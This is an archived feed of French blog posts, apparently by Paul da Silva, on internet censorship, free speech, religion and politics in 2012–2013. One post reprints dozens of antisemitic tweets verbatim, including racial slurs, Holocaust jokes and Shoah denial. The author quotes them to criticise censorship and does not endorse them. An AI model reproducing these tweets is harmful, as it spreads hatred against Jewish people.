La réalité c’est que rien n’ira mieux tant que l’on continuera à essayer de s’inscrire dans un schéma qui nous oppose les uns aux autres, tant que les politiques, de quelque bord qu’ils soient, continueront à faire passer leurs velléités personnelles de carrière avant le pays mais surtout avant le peuple dont ils sont supposés représenter les intérêts.

Le constat est que notre modèle « démocratique » actuel ne l’est pas tant que ça, que le vote ne suffit pas à garantir au peuple que ses intérêts seront défendus. Que l’on n’a pas besoin de la droite, de la gauche ou des extrêmes et pseudo-centristes qui gravitent autour et monopolisent un débat qu’ils maîtrisent bien mieux que les actions qu’ils devraient mener pour espérer un jour que l’on vive mieux.

La conclusion est que l’on a besoin d’un changement non pas de gouvernants mais de gouvernance…

Attention toutefois, la situation actuelle ne profite qu’à une seule chose : sa perpétuation par les extrêmes. C’est pour cela que la droite comme la gauche se radicalisent, c’est pour cela qu’à la compétence de certains a succédé l’éloquence d’autres et c’est pour cela que toutes les élites jouent le jeu des racistes, homophobes et autres haineux.

Mais surtout c’est comme cela que l’on verra demain arriver un « dictateur éclairé » qui convaincra la foule qu’il est « l’Homme providentiel », qu’il nous sauvera. Il ne l’est, ne le fera, vous l’êtes et le ferez.

Flattr this!

]]>
On reparle de la haine sur les réseaux sociaux ?http://www.paulds.fr/?p=2526http://streisand.me.thican.net/paulds.fr/index.php?20130227_133400_On_reparle_de_la_haine_sur_les_reseaux_sociaux__Wed, 27 Feb 2013 12:34:00 +0000Vous n’êtes pas sans savoir que l’Union des Étudiants Juifs de France (UEJF) a demandé et obtenu le retrait de tweets au regard de leur caractère antisémite il y a peu. J’avais alors pris position contre cette censure que j’ai qualifié plusieurs fois de contre-productive et puérile.

Aujourd’hui c’est une autre organisation juive qui me donne l’occasion de prendre la plume : la Ligue de Défense Juive (LDJ) qui se gausse, sur facebook cette fois-ci, du décès de Stephane Hessel alors que son cadavre n’est pas encore froid :

ldj_hessel

 

Sans faire d’amalgame entre les deux organisation et sans jamais envisager une seconde même que l’UEJF puisse soutenir cette prise de position qui, même si certains sont convaincus de sa véracité, n’est pas digne d’un mouvement religieux supposé prôner des valeurs d’humanité, je trouve le parallèle intéressant.

D’un côté, dans le coin nord est du ring, nous avons l’UEJF qui demande à ce que les messages véhiculant la haine soient censurés et leurs auteurs sanctionnés. De l’autre côté, dans le coin sud ouest du même ring, la LDJ qui véhicule elle-même une forme de haine (sur ce cas particulier et quelques autres dans les commentaires).

Alors si l’on suit la logique qui a conduit l’UEJF à faire supprimer les tweets qui la dérangeaient, doit-on faire supprimer ce statut facebook ? Et demain un autre, d’une organisation catholique sur Google+ ?

Non, comme je l’ai répété à de multiples occasions là aussi : la liberté d’expression c’est aussi pour les cons, et j’aime savoir qui sont les cons autour de moi. Je suis convaincu que ce statut facebook a fait réaliser à certains adhérents de la LDJ qu’ils n’ont pas envie de cautionner ce type de prises de position de la part d’une organisation qui parle en leur nom par exemple…

Pour ma part je trouve cela formidable de lire les commentaires sous ce statut, je suis ravi d’avoir lu des prises de position radicalement opposées à celle-ci, d’autres citer des sources prouvant la prétendue accusation de la LDJ…

Bref, la haine ne mène à rien mais vient forcément de quelque part… et ça m’intéresse beaucoup plus de comprendre d’où que de faire comme si elle n’existait pas.

EDIT: La page en question n’est plus. On ne peut que supputer qu’il s’agisse d’un signalement massif… mais on le suppute grave quand même !

flattr this!

]]>
A vendre : le manuscrit original de Piratons la démocratiehttp://www.paulds.fr/?p=2516http://streisand.me.thican.net/paulds.fr/index.php?20130218_135837_A_vendre___le_manuscrit_original_de_Piratons_la_democratieMon, 18 Feb 2013 12:58:37 +0000Certains le savent, d’autres non, fin 2011 j’ai écrit un livre : Piratons la démocratie. Parce que je voulais réellement que le contenu du livre se propage j’ai fait en sorte qu’il soit accessible au plus grand nombre avec un prix plancher sur lequel je ne touche pas un centime de droit d’auteur, une licence CC-By qui permet sa réutilisation sous d’autres formes et des versions numériques gratuites.

manuscrit_piratons_la_democratie Aujourd’hui le livre, dans sa version papier, s’est écoulé à quelques centaines d’exemplaires mais est surtout disponible un peu partout en pdf, en ebook, en html5, …

Je suis relativement satisfait de l’expérience à part que je réalise aujourd’hui que j’aurai du bosser beaucoup plus longtemps sur le sujet et sortir quelque chose de plus fouillé, couvrant un périmètre beaucoup plus large que ce qui est traité dans Piratons la Démocratie. J’ai du coup commencé ce travail sur un bouquin que je sortirai quand je serai satisfait (tout en sachant que je ne le serai plus un an après sa sortie) : Piratons la/les société(s).

Dans le même temps, en faisant mes fonds de tiroirs, je suis retombé sur le manuscrit original de Piratons la démocratie, celui que j’ai imprimé et donné à relire comme premier jet à ma chère moman avant de l’annoter moi-même et de reprendre le tout pour l’envoyer à l’éditeur. Je me suis demandé ce que je pourrai en faire et puis j’ai repensé à une artiste que j’aime beaucoup (Emilie Autumn pour ne rien vous cacher) qui a mis en vente il y a peu des accessoires de ses costumes de scène et je me suis dit « pourquoi pas ».

Je viens donc de publier ce midi une annonce sur ebay pour vous permettre d’acquérir le manuscrit en question, que je vais signer et dater comme s’il s’agissait d’un truc important (qui sait s’il le deviendra) et y adjoindre une copie du livre final, dédicacée elle aussi, à qui remportera l’enchère.

Les livres et versions numériques eux ne bougeront pas de leur prix plancher ou leur gratuité et je réitérerai l’expérience dans les mêmes conditions pour le prochain.

Ah oui, l’annonce : Manuscrit original et signé de Piratons la démocratie par Paul da Silva

Flattr this!

]]>
Rencontre avec l’UEJF au sujet de la censure Twitterhttp://www.paulds.fr/?p=2510http://streisand.me.thican.net/paulds.fr/index.php?20130215_134820_Rencontre_avec_l___UEJF_au_sujet_de_la_censure_TwitterFri, 15 Feb 2013 12:48:20 +0000Quelle ne fut pas ma surprise de trouver la semaine dernière dans mes mails une invitation au débat émanant de l’UEJD (Union des Etudiants Juifs de Dauphine) à propos de l’affaire qui les oppose à Twitter. Après m’être assuré qu’ils avaient bien compris ce que je défends j’ai accepté avec plaisir de débattre, comme je le fais souvent.

A la tribune je me suis vu rejoindre par Jonathan Hayoun (président de l’UEJF), Didier Rappaport (co-fondateur de Dailymotion) et Gérard Haas (avocat spécialisé en NTIC et CPI), le tout animé par Amandine Schmidt du Nouvel Obs (que je n’ai pas eu le temps de remercier, merci Amandine). Dans la salle trente à cinquante personnes, on est un soir de saint Valentin…

Pas de captation sonore ou vidéo ni de streaming. Heureusement dans la salle un Pirate qui va livetweeter le débat sur le compte Twitter @idfpartipirate. Ils sont partout ces pirates !

uejd_debat

Je ne peux pas retranscrire la totalité du débat du fait d’une mémoire de poisson rouge d’une part et accessoirement du fait que j’étais parti prenante au débat et donc que mon point de vue affecte forcément ce que je vais vous raconter ici. Il y a cependant des points sur lesquels je veux revenir, des réflexions que j’ai eu et des points de vue que j’ai compris un peu mieux (sans pour autant tomber en accord avec) grâce à cette formidable invention qu’est la discussion.

Ce qui est principalement ressorti des interventions qui ont précédé la mienne, à différents niveaux, est que l’action de l’UEJF était nécessaire et qu’elle n’allait pas, selon eux, à l’encontre d’un Internet libre et ouvert pour lequel ils m’ont tous assuré être. Tous se sentaient simplement plus ou moins démunis face à la réponse de Twitter qui visait à leur expliquer qu’ils n’étaient pas tenus à la loi française mais à la loi du pays dans lequel ils sont établis (US, Californie).

Un certain nombre de détails ont été donnés sur l’implication du gouvernement dans l’histoire, comment ces derniers voulaient négocier avec Twitter un statut privilégié pour les associations qui feraient dans le signalement. Cette proposition a été refusé par l’UEJF qui considère que Twitter doit se plier à la loi française et que la différence entre ce qui est recoupé sous le principe de « liberté d’expression » est à l’avantage de la France (plus restrictive donc que les USA) d’un point de vue humain comme historique.

J’ai assez vite compris que j’étais le seul à ne pas cautionner, voire à condamner l’action de l’UEJF, dans le panel des intervenants. J’ai donc commencé ma prise de parole par préciser que j’étais l’avocat du diable (rôle que j’affectionne par ailleurs vu que je considère que l’on s’épanouit mieux dans l’adversité que dans le consensus) et que bien que je comprenne les motivations, nobles, de l’UEJF, leurs effets pourraient être désastreux si l’on prend le débat autrement que d’un point de vue franco-français.

Comment en effet vouloir faire plier Twitter à la loi France et refuser demain qu’ils se plient à la loi Syrienne ou Tunisienne pré-soulèvements ? Qu’adviendrait-il alors du réseau ?

A cet effet Gérard Haas a proposé d’imposer pour toute entreprise ayant une activité en France d’y avoir un représentant légal. Je me souviens avoir crié à cette idée qui coûterait à mon avis le Net à l’union européenne (gageons que si la France lance cette idée elle sera suivie par les autres états membres) par une limitation géographique systématique excluant les pays ayant adopté cette mesure. Pour qui voudrait entreprendre sur le Net en Europe cela voudrait dire un coût supplémentaire que je ne juge ni utile ni juste dans un esprit de libre concurrence, quand on sait ce que représente le Net en termes de croissance en France et dans l’UE ce serait dommage pour quelques tweets…

A ce propos j’ai aussi expliqué que l’action de l’UEJF et l’indignation collective avaient fortement contribué à faire parler des hashtags incriminés, que la quantité de contenus réellement haineux était en fait relativement faible. J’ai cité à cet exemple l’expérience #ZombieBukkake que nous avions lancé avec @Korben et qui avait fini en trending topics mondiaux en moins de deux heures, principalement à cause de personnes se demandant d’où cela venait, se disant choqués ou répugnés… Merci à Marc Rees de m’avoir demandé de traduire le terme d’ailleurs…

Enfin, au delà de ces problématiques purement techniques j’ai soutenu que la censure ne faisait qu’attaquer un symptôme sans résoudre le mal initial, que cacher la haine ne la fait pas disparaître mais au contraire grandir. On ne tombera pas d’accord sur ce point, Jonathan Hayoun m’expliquant que beaucoup d’efforts étaient déployés sur l’évolution des mentalités mais qu’il fallait leur adjoindre de la répression… Toujours très loin d’être convaincu pour ma part.

Bref le débat s’est passé en bonne intelligence, j’ai peur qu’il ne change pas grand chose mais les quelques personnes qui aiment autant la saint Valentin que moi ont, j’espère, pu profiter d’un échange vivant et contradictoire. Pour ma part je remercie encore les autres intervenants dont je me suis enrichi du point de vue.

Au delà du débat, sur le chemin du retour pour tout vous dire, je me suis demandé quelle pourrait être la solution. Pas une solution pour ce problème là, mais une vraie problématique de gouvernance du Net. Je n’ai bien sûr pas de réponse mais quelques points me paraissent essentiels :

  • la concertation doit être mondiale et pas nécessairement se faire par le bas.
  • le résultat, quelle que soit sa forme, doit être plus réactif que la plupart des institution existantes sans pour autant bafouer leurs principes (justice, droit et bien sûr devoirs)
  • la « morale » est rarement bonne conseillère
  • on va en chier !

Flattr this!

]]>
La cathophobie c’est mal m’voyez !http://www.paulds.fr/?p=2495http://streisand.me.thican.net/paulds.fr/index.php?20130212_134849_La_cathophobie_c___est_mal_m___voyez__Tue, 12 Feb 2013 12:48:49 +0000Le 2 mai 2011 je démissionnais du Parti Pirate. Depuis j’ai essayé d’être à peu près politiquement correct (même si parfois j’ai pu déraper) pour éviter que mes propos soient repris précédés de « l’ancien président du Parti Pirate a dit »… Et puis il y a quelques semaines j’ai décidé que ça avait assez duré, que la période de deuil était révolue et que je pouvais me permettre de faire sauter le voile d’auto-censure qui commençait à sérieusement me rendre schizophrène.

Du coup j’ai commencé à redevenir moi-même, à jouir de ma liberté d’expression que je considère sans aucune limite (oui vraiment bande de cons !) à me rire de tout, du meilleur mais surtout du pire. J’aime les blagues crades, l’humour noir, le WTF est ma seule religion et je n’ai pas peur de choquer ou de gêner qui que ce soit…

Jusqu’ici tout va bien.

Sauf que forcément j’en ai choqué certains au passage… Très franchement ça m’amuse encore plus. Sachez que chaque fois que je poste un truc plus trash que le précédent je jubile intérieurement, note le nombre de followers que j’ai, tweete, ris des réactions et regarde à nouveau le nombre de followers. Si j’en ai perdu j’ai gagné.

Et devinez qui s’est le plus offensé de mes propos ? Nos amis catholiques, choqués entre autres par ce tweet (qui pourtant écorne au passage beaucoup plus gravement l’Islam ayant fait la connerie d’écrire « musulman » là où j’aurai du mettre « islamiste » – mes excuses sincères pour ça, pas pour le reste) :

 

Qui suis-je ?

Au regard de ce tweet je suis donc cathophobe, islamophobe et pédophile (normalement j’ai des points en plus pour le combo là non ?).

Sauf que je me contrefous des religions et que j’ai horreur des enfants (je les supporte pas dans les transports, c’est pas pour les foutre dans mon lit).

Suis-je plein de haine ? Je ne pense pas.

Intolérant ? Pas vraiment, c’est même plutôt le contraire (flemme de me justifier sur ce propos, lisez ce blog ou mes tribunes ailleurs).

Alors que suis-je ? Un peu con surement, mais surtout libre. Je suis libre de m’amuser de ce que je veux et quand je le veux. Si vous regardez bien je n’attaque jamais une personne pour ses choix ou ce qu’elle est. Les attaques ad hominem (un peu de latin dans un article sur la cathophobie, pour le swag) que je fais parfois se limitent à critiquer les prises de positions, actes ou déclarations typiquement dans le cas des politiques et autres personnes publiques.

Les religions quant à elles me paraissent obsolètes voire dangereuses (j’en reparlerai un jour) mais les croyants ne me gênent pas. Pour en avoir quelques uns autour de moi ils pourront même vous dire que je suis très respectueux envers leurs croyances… tant qu’ils ne me cassent pas les couilles avec. Dès lors qu’ils me les brisent je vois pas pourquoi je me retiendrai de leur rendre la pareille; sauf qu’en plus moi je le fais en rigolant, sans aucune méchanceté ou envie de prosélytisme.

La cathophobie…

Maintenant la grande mode est à la position de victime et certains en profitent pour enrichir le dictionnaire des néologismes de mots aussi stupides que « cathophobie » avant d’asséner ce terme comme une insulte, un reproche, quelque chose dont on devrait avoir honte…

On aurait donc peur des cathos ? De la religion catholique ? Non c’était y’a quelques siècles que cette religion faisait peur. Aujourd’hui au pire elle attriste, souvent fait sourire et d’un point de vue intérieur elle apporte surement beaucoup de bonheur à ses pratiquants. Comme les autres.

Là où ce terme me gêne c’est qu’il a été inventé pour l’occasion et ressort quand ça arrange bien ceux qui le brandissent comme une croix qui leur pèse depuis des millénaires…

L’exemple en image de ce que l’on essaye de nous faire gober comme une tendance de fond, comparée à un vrai problème (oui a cathophobie c’est le petit trait bleu en bas là) :

trends_homophobie_cathophobie

 

source : Google Trends

Wake up !

Il m’arrive souvent de défendre l’Islam parce que je considère que le traitement de l’actualité relatif à cette religion est biaisé par chez nous, que les médias essayent de faire passer les musulmans pour des terroristes intégristes barbus en robe. A l’inverse je trouve le traitement de la religion catholique plutôt positif. Il y a certes quelques faits divers mais ils sont présentés comme tels, et quand ils se reproduisent de trop c’est la population elle même qui fait les amalgames que vous regroupez sous le terme de cathophobie.

Partant de là il me semble beaucoup plus simple de lutter (intelligemment, pas en se réfugiant en victime derrière un néologisme-kinder-surprise) contre ce qui ne devrait pas devenir un état de fait si vous voulez véhiculer des valeurs de paix et amour (me semble que c’est Dieu ça non ?) :

Vous ne voulez plus être pris pour des pédophiles ? Punissez sévèrement les prêtres quand un fait divers sur le sujet éclate !
Vous ne voulez plus être pris pour des homophobes ? Prenez position fermement contre ceux qui dans vos rangs le sont et s’en réclament !

Je sais pas pour vous mais en plus moi ça m’arrange qu’on ait moins de pédophiles et d’homophobes en plus de réduire le nombre de « cathophobes » ! La tolérance c’est comme la sexualité : dans les deux sens.

Flattr this!

]]>
#UnBonJuif Quand l’UEJF demande une censure au bazookahttp://www.paulds.fr/?p=2476http://streisand.me.thican.net/paulds.fr/index.php?20130125_141257__UnBonJuif_Quand_l___UEJF_demande_une_censure_au_bazookaFri, 25 Jan 2013 13:12:57 +0000Depuis le début de l’histoire UEJF vs Twitter visant à faire plier ce dernier à une loi française vétuste qui ne répond pas du tout à la problématique du racisme je n’ai pas caché mon énervement face à cette mascarade politico-médiatique servant de faire valoir aux premiers et d’apporteur de trafic aux seconds.

J’attendais avec impatience la plainte formulée par l’UEJF (Union des Etudiants Juifs de France) pour voir à la fois comment la censure avait été mise en place et surtout sur quels contenus elle avait été réclamée. C’est aujourd’hui chose faite puisque je suis tombé sur le document en question chez Chilling Effects : UEJF Complains to Twitter of Anti-Semitic Tweets.

Comment la censure est opérée (et contournable)

Il s’agit donc d’une censure basée sur l’origine géographique de l’utilisateur elle même calculée en fonction du pays indiqué dans le profil si l’utilisateur est connecté ou de son adresse IP s’il ne l’est pas.

Autant vous dire que le nombre de méthodes pour contourner cette censure frôle l’infini. Vous pouvez par exemple changer de pays dans votre profil Twitter (on ne vous demandera que de confirmer votre mot de passe) ou utiliser un proxy / VPN / Anonymizer / …

Lorsque l’on est un innocent internaute qui ne sait pas trop ce qui se passe ça donne ceci (j’ai pris le premier de la liste) :

censure_geographique_twitter

 

Sinon… Et bien on voit le tweet en question…

Et qu’est-ce qui est censuré au juste ?

Plus que ce que Twitter a accepté de censurer j’ai pris la décision de lister ici l’ensemble des tweets, et plus largement liens, que l’UEJF a demandé à Twitter de censurer en fin d’article ou en suivant ce lien sur pastebin, en téléchargeant ce fichier texte… en ces temps de censure on n’est jamais trop prudent…

Je ne fais pas ça par provocation mais parce que la censure sous toutes ses formes m’insupporte et qu’ici on se retrouve avec un cas d’école prouvant comment les meilleures intentions du monde peuvent amener à un joli désastre totalitariste.

Dans le lot pas de mal de tweets ont été supprimés par leurs auteurs et quelques comptes suspendus, on ne pourra donc pas se faire d’idée sur le contenu de ces liens (mais on peut s’en faire une sur le caractère très éphémère de leur durée de vie). A part cela une flopée de mauvaises blagues (j’en connais de bien plus drôles dans le registre et j’ai du en apprendre à peine 2 ou 3 que je ne connaissais pas déjà) et quelques uns, beaucoup du même utilisateur, qui semblent être réellement motivés par une forme de haine.

Au titre des absurdités relevées on compte : un utilisateur qui apostrophe Najat Vallaud-Belkacem sur le contenu d’un tweet qui justement le choque, une journaliste de la BBC qui essaye de contacter l’un des créateurs du hashtag et un profil entier…

On passe donc d’une motivation, que je pourrai comprendre si elle n’était pas tant contre-productive, de cacher des messages choquants pour une partie de la population à de la censure au bazooka les yeux fermés. C’est justement une des raisons qui font que nombreux sont ceux qui s’élèvent contre la censure : le risque de sur-blocage dont on a déjà entendu parler lors des débats sur la LOPPSI2, l’Arjel ou l’Hadopi (pour ne citer qu’eux).

Twitter a bien sur coupé dans le gras et censuré que ce que lui voulait bien reconnaître choquant, ce qui fait que l’on a deux acteurs qui successivement ont décidé arbitrairement de ce qui était moralement répréhensible ou non pour décréter au final une censure (inutile) dictée par les sentiments plus que par une décision réfléchie. En passant rappelons que la morale a souvent plusieurs façons d’être perçue, citons au hasard ce filtre parental Orange dont la liste des sites à censurer est établie par un ordre religieux ou cette décision de censure d’une publicité au motif qu’elle objectifierai la femme quant avec une autre lecture on réalise que c’est la censure elle-même qui réalise ce propos.

Au delà de ça je vous laisse découvrir ce que l’UEJF trouve tellement choquant qu’elle a obtenu de la justice française que Twitter (qui répond toujours à la loi américaine) doive lui communiquer les informations d’utilisateurs (ce que Twitter ne fera vraisemblablement pas, l’astreinte décrétée en cas de refus d’obtempérer étant elle même du ressort du droit… français !)…

Et donc les tweets si outrageants ?

Avant que cela ne prenne des proportions rigodroles j’invite les avocats de l’UEJF ou leurs responsables à me contacter avant toute poursuite. Si poursuite il doit y avoir sachez que je maintiendrai la liste que je m’apprête à publier ici en ligne (ici ou ailleurs) et encouragerai tout le monde à le faire (Vous connaissez Barbra Streisand ?) justement dans l’intérêt de la lutte contre le racisme qui n’est jamais passée et ne passera jamais par des procédés anti-démocratiques comme la censure.

Sachez enfin que j’édite ce blog en nom propre (merci de ne pas spammer mes boites), et à but non-commercial. Je tiens à votre disposition mon adresse postale pour envoi d’un courrier de mise en demeure (que je ne suivrai pas) et / ou un créneau horaire à votre convenance pour discuter en bonne intelligence

Les tweets dont l’UEJF a demandé la censure (mise en gras par mes soins) :

https://twitter.com/He_dax/status/260047367762497536
#ChezLesIsraéliens Sa cache des billets dans leurs gros Nez crochues

https://twitter.com/Besbar/status/260045864788168705
*deleted*

https://twitter.com/SuufOfficiel/status/259732903393636352
#UnJuifMort est un juif qui a creusé sa tombe avec son nez !

https://twitter.com/Sipakoholic/status/259729848333905921
Soyez fiers de vous en 2 nuits on a mis en TT les hashtag les plus hardcores de l’histoire : #UnJuifMort et #BesbaBaiseIsraël *_*

https://twitter.com/ATaarabt92/status/259724728250535937
#BesbarBaiseIsrael mais dabord il baise #UnBonJuif pour qu’il devienne #UnJuifMort

https://twitter.com/vincentvilela/status/259440840513052672
*deleted*

https://twitter.com/chawkicherrak/status/259460677872271360
*Account suspended*

https://twitter.com/Samir128424/status/259440281982738432
#UnJuifMort c’est unbonjuif

https://twitter.com/Hassan_S30/status/259401123234988032
#UnJuifMort …que son âme repose en enfer , #Amin #SangLibanaisBienChaudSuisJe

https://twitter.com/Fille_Du_Dicton/status/259379230889091073
*deleted*

https://twitter.com/eddy92zero/status/259377861159440384
#UnJuifMort perçoit toujours sa retraite

https://twitter.com/eddy92zero/status/259376719100784640
#UnJuifMort est plus riche que toi vivant

https://twitter.com/Le_FDP/status/259375731480596480
#UnJuifMort c’était bien

https://twitter.com/luismarianette/status/259374744489570304
@najatvb @Jow_Dingueriie: #UnJuifMort se fait trancher le nez par des braconniers pour le revendre comme 1corne2Rhinocéros. SYMPA,NON????

https://twitter.com/eddy92zero/status/259373170614734848
#UnJuifMort a un cimetière dédié pour lui seulement

https://twitter.com/ThePolyakene/status/259372834751664128
#UnJuifMort sent le grillé

https://twitter.com/eddy92zero/status/259372606971596800
#UnJuifMort on l’enterre dans un cerceuil en or

https://twitter.com/TwitYa_06/status/259372248236957696
#UnJuifMort ne deviendra jamais poussiere Il restera Cendre

https://twitter.com/loadedrichard/status/259371667304902656
#UnJuifMort ne monte pas au paradis, il monte en bourse.

https://twitter.com/BilahHabre/status/259370987668258816
#UnJuifMort est un juif accompli

https://twitter.com/Jalis_93/status/259370950489931776
#UnJuifMort rend un palestinien heureux

https://twitter.com/HoussemBolt/status/259370350591238144
#UnJuifMort a 90% de chances d’avoir connu Hitler. 10% de chance sont une mort naturelle ou par un assassinat nasal.

https://twitter.com/HoussemBolt/status/259368969520160768
On grave le blase de défunt d’#UnJuifMort sur son nez qui sort de la terre de deux ou trois mètres.

https://twitter.com/Le_petit_Belge/status/259368558746800128
#UnJuifMort ne payerait pas 10 euros pour revenir à la vie.

https://twitter.com/_Helheim/status/259368247927910400
*deleted*

https://twitter.com/Jow_Dingueriie/status/259367487286681602
#UnJuifMort se fait trancher le nez par des braconniers pour le revendre comme 1corne2Rhinocéros.

https://twitter.com/Le_FDP/status/259367268104949760
#UnJuifMort c’est un apéro pour Hitler

https://twitter.com/Le_FDP/status/259367178799812608
#UnJuifMort c’est le début d’une grande histoire

https://twitter.com/Le_FDP/status/259366365574610944
#UnJuifMort c’est un FDP en moins

https://twitter.com/HoussemBolt/status/259366331533623298
#UnJuifMort est enterré entre deux mégots.

https://twitter.com/HoussemBolt/status/259366170161991680
#UnJuifMort n’oubliera pas les intêrets que tu lui doit.

https://twitter.com/Mohaa_Mentalist/status/259366154164912129
#UnJuifMort = un animateur télé en moins

https://twitter.com/Jow_Dingueriie/status/259366030181289984
#UnJuifMort n’a pas sa place dans 1cercueil mais dans 1cendrier.

https://twitter.com/OfficielRoh2f/status/259365739755077632
*Account suspended*

https://twitter.com/HoussemBolt/status/259365113226752000
#UnJuifMort est #UnBonJuif.

https://twitter.com/Tilahh/status/256132913404469249
#UnBonJuif c’est un dur à cuire lol ^__^

https://twitter.com/Biiilal91/status/256116976177532929
*deleted*

https://twitter.com/weissercappu/status/257852144529571840
@Besbar Bonjour Ahmed. Seriez-vous disponible pour une interview en anglais sur #UnBonJuif? C’est pour la BBC. lisa.louis@bbc.co.uk

https://twitter.com/ShayYeezy/status/257514799561318402
Les juifs quand ils naissent y a une main-courante qui est déposée automatiquement.

https://twitter.com/Louis_Baltimore/status/257754152552239104
*deleted*

https://twitter.com/YanisMorray
??

https://twitter.com/Fille_Du_Dicton/status/257515084576874497
*deleted*

https://twitter.com/Louis_Baltimore/statuses/257849556295884800?tw_i=257849556295884
800&tw_e=details&tw_p=twt

*deleted*

https://twitter.com/SooAyhana/status/258949615590723584
*deleted*

https://twitter.com/jawad238/status/259032044586287104
@eddy0013 @orny33 @jerxav merah a tué des gamins c pas bien mais les juifs ils tuent des centaines

https://twitter.com/jawad238/status/259030459395239937
@Orny33 @eddy0013 @jerxav la passion du chrrist . Au diable les juifs قتلة الانبياء tueurs de prophète

https://twitter.com/jawad238/status/259029629157924864
@Orny33 @eddy0013 @jerxav moi les juifs je deteste et ca n engage que moi ,en plus c en connaissance de cause .

https://twitter.com/jawad238/status/258878412284903424
@eddy0013 @jerxav en fait rien ne m oblige . Vous vous êtes senti visés ça vous regarde et je préfère être un animal que juif assassin

https://twitter.com/jawad238/status/258650280273514496
@RETWITTEUSE rigole comme tu veux les juifs c une sale race et j assume

https://twitter.com/yosri06/status/258610302038458368
@Rabbi_david @marceltolede @linformatrice @siguasierra il te manque les vrais nazis on dirait !! :))

https://twitter.com/yosri06/status/258635787418079233
@Rabbi_david @grossemite @uejf_ slt les experts de la manipulation des masses :)

https://twitter.com/AlexiSlideAway/status/257803322206089216
La Shoah a été crée par les juifs eux-mêmes et je vous emmerde !

https://twitter.com/Souhail_S/status/258874633472856064
*deleted*

https://twitter.com/Souhail_S/status/257810767687081985
*deleted*

https://twitter.com/BoucherduPorche/status/257806066392383488
Les juifs NIQUEZ VOS MÈRES

https://twitter.com/Souhail_S/status/257806819408375808
Les juifs il ce sont cru intouchable ces enculés

https://twitter.com/Wouallah/status/257927327940485120
*deleted*

https://twitter.com/AbdelDouble/status/257534198729027585
*deleted

À mon humble avis ce dont ces gens ont besoin c’est plus d’aller en cours qu’au tribunal…

flattr this!

]]>
Il va mourir ce foutu Internet ? J’ai presque plus de popcorn !http://www.paulds.fr/?p=2470http://streisand.me.thican.net/paulds.fr/index.php?20130104_100437_Il_va_mourir_ce_foutu_Internet___J___ai_presque_plus_de_popcorn__Fri, 04 Jan 2013 09:04:37 +0000Mon god, on va tous mourir, Free censure, la faute aux ayants-droits, le gouvernement et ces foutus communistes qui nous piquent nos acteurs / viticulteurs ! Un beau bordel sur la twittosphère en ce moment, un beau bordel au boulot, un beau bordel perso (perso-boulot hein)… Et tout ça pour quoi ? Une option de plus sur la freeboite V6 qu’elle est vilaine.

Alors juste au cas où vous seriez parti avec Depardieu en Russie, un petit rappel des faits : Free (aka le gentil FAI) a sournoisement déployé un bloqueur de pub dans le firmware (sorte d’OS) de sa box de dernière génération. Ce petit truc joyeux est activé par défaut, n’a été accompagné d’aucune communication et n’autorise aucun autre contrôle que « ON / OFF »…

Maintenant le problème (si tant est que cela en soit un) soulevé par la majorité des gens qui hurlent : il y a plein de sites qui vivent de la pub pour fournir leurs contenus gratuitement, des régies qui vont mourir, et peut-être aussi des bébés phoques… fuck !

Oui mais ça je m’en fous… Depuis le temps que l’on reproche aux « industries du divertissement » de ne pas se renouveler devant un marché qui change le retour de baton est presque succulent de truculence…

Le vrai problème du coup est uniquement démocratique (même si je trouve le mot un peu lourd pour l’occasion) : Free est juge et partie dans l’histoire. Il décide de ce qui est bloqué alors même qu’il a des intérêts évidents dans l’histoire. Si tout était bloqué, sans aucune exception comme c’est le cas actuellement, et que l’option était désactivée par défaut, activable simplement par l’utilisateur qui garderait une forme de contrôle dessus et que Free communiquait massivement dessus pour pousser ses clients à s’offrir un Internet lavé de toutes ses pubs on dirait quoi ?

En l’état la seule chose que je vois, si le service devait se maintenir et sortir de l’état de beta, c’est une solution qui apporte une forme de valeur ajoutée à l’utilisateur. Il ne faut pas se mentir : aucun utilisateur lambda n’aime ou ne comprend le pourquoi des pubs.

L’état de fait est devenu celui-ci : la pub gêne et depuis toujours la réponse des éditeurs est la même « oui mais on a pas le choix pour continuer à fournir du contenu gratuit ». Bah voilà ma réponse à ce nouveau rebondissement : on n’a plus le choix que de trouver une nouvelle solution, même si l’option était discontinuée demain (ce qui est plus que probable) une partie de la population a découvert dans la bataille qu’il est possible de se débarasser de la pub… Et ce même sans intervention de Xavier Niel…

Plus le temps avance, plus les évenements s’accumulent et plus la nécessité de jeter ce bon vieux Internet pour reconstruire quelque chose de moins contrôlable, plus décentralisé et résilient se font sentir… Tous les coups portés contre le Net que l’on connait à l’heure actuelle va en ce sens et j’ai hâte de voir ce qui renaitra des cendres du phoenix quand tous ces sauvages auront fini de lui cramer la gueule.

flattr this!

]]>
« Un monde meilleur » grace au Net ? #26actshttp://www.paulds.fr/?p=2465http://streisand.me.thican.net/paulds.fr/index.php?20121230_155119_____Un_monde_meilleur_____grace_au_Net____26actsSun, 30 Dec 2012 14:51:19 +0000Hier je me faisais l’écho de la morosité ambiante qui amène les gens à se tourner les uns contre les autres, j’avais par ailleurs retrouvé beaucoup de ce que je pense à ce sujet dans l’article de David Abiker que j’ai oublié de relayer. Mais comme je n’aime pas regarder un verre à moitié vide sans chercher une tireuse à bière pour essayer de le remplir, le hasard (bon ok la théorie du chaos) a fait que je suis tombé sur une initiative que je veux relayer aujourd’hui : #26acts.

Vous aurez compris qu’il s’agit là encore d’un hashtag twitter (fucking société 2.0) mais cela va bien au delà…

Suite à la tuerie de Newtown, et comme c’est souvent le cas à la suite de tragédies (mon côté verre à moitié plein là), un certain nombre de bonnes idées ont émergé. Je vous avais parlé de Michael Moore qui avait décidé de relayer une version piratée de son film bowling for columbine (avec le dénouement hollywoodien que l’on sait) pour qu’il soit utile dans la réflexion qui devrait suivre, mais il y a mieux…

Pay it foward (un monde meilleur en français dans le texte) est un film, basé sur un roman du même nom, qui vient de souffler sa 12e bougie. Kevin Spacey, le visage brûlé pour l’occasion au 2e degré, y incarne un prof de sixième qui demande à sa classe de plancher sur un moyen pratique de rendre le monde meilleur. La solution du môme que l’on suivra pendant le film est de rendre des services à 3 inconnus en leur donnant pour instruction d’eux mêmes relancer le mouvement en accomplissant à leur tour trois bonnes actions et en faisant passer le message. Je vous fais pas le synopsis, je suis sur que le vidéofutur du coin (lisez The Pirate Bay) vous en dira bien plus que moi sur le film !

